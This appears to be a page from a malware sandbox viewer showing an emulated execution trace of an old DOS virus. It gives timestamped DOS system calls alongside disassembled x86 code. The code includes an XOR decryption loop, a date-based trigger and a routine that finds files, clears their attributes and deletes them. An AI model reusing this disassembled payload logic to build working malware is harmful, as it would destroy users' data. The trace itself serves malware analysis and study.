Sample viewer

vx.netlux.org/Virus.DOS.Corea.Nambul.722.a

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:04:51.380808301Z 44 PC: 13e66 | Get time
0x13e66: mov byte ptr ds:[bp + 0x10e], dl
0x13e6b: mov byte ptr ds:[bp + 0x10c], dl
0x13e70: mov byte ptr ds:[bp + 0x103], dl
0x13e75: mov byte ptr ds:[bp + 0x104], dl
0x13e7a: mov byte ptr ds:[bp + 0x105], dl
0x13e7f: mov byte ptr ds:[bp + 0x106], dl
0x13e84: mov byte ptr ds:[bp + 0x107], dl
0x13e89: mov byte ptr ds:[bp + 0x108], dl
0x13e8e: mov byte ptr ds:[bp + 0x109], dl
0x13e93: mov byte ptr ds:[bp + 0x10a], dl
0x13e98: lea si, word ptr [bp + 0x354]
0x13e9c: mov cx, 0x2d2
0x13e9f: mov al, byte ptr ds:[bp + 0x34b]
0x13ea4: xor byte ptr [si], al
0x13ea6: inc si
0x13ea7: loop 0x13ea4
0x13ea9: mov ah, 0x2a
0x13eab: int 0x21
0x13ead: cmp cx, 0x7ce
0x13eb1: jg 0x13eba
2018-12-17T22:04:51.383583295Z 42 PC: 13ead | Get date
0x13ead: cmp cx, 0x7ce
0x13eb1: jg 0x13eba
0x13eb3: cmp dh, 3
0x13eb6: jg 0x13eba
0x13eb8: jmp 0x13f2e
0x13eba: mov ah, 0x4e
0x13ebc: lea dx, word ptr [bp + 0x3a6]
0x13ec0: mov cx, 0
0x13ec3: int 0x21
0x13ec5: jb 0x13edd
0x13ec7: mov ax, 0x4301
0x13eca: xor cx, cx
0x13ecc: mov dx, 0x9e
0x13ecf: int 0x21
0x13ed1: mov ah, 0x41
0x13ed3: int 0x21
0x13ed5: mov ah, 9
0x13ed7: lea dx, word ptr [bp + 0x354]
0x13edb: int 0x21
0x13edd: mov ax, 0x304b
2018-12-17T22:04:51.38639111Z 78 PC: 13ec5 | Find first file
2018-12-17T22:04:51.390554739Z 48 PC: 13ee2 | Get DOS version
2018-12-17T22:04:51.392673437Z 53 PC: 13ef1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:04:51.39444131Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:04:51.399924777Z 0 PC: 12a89 | Program terminate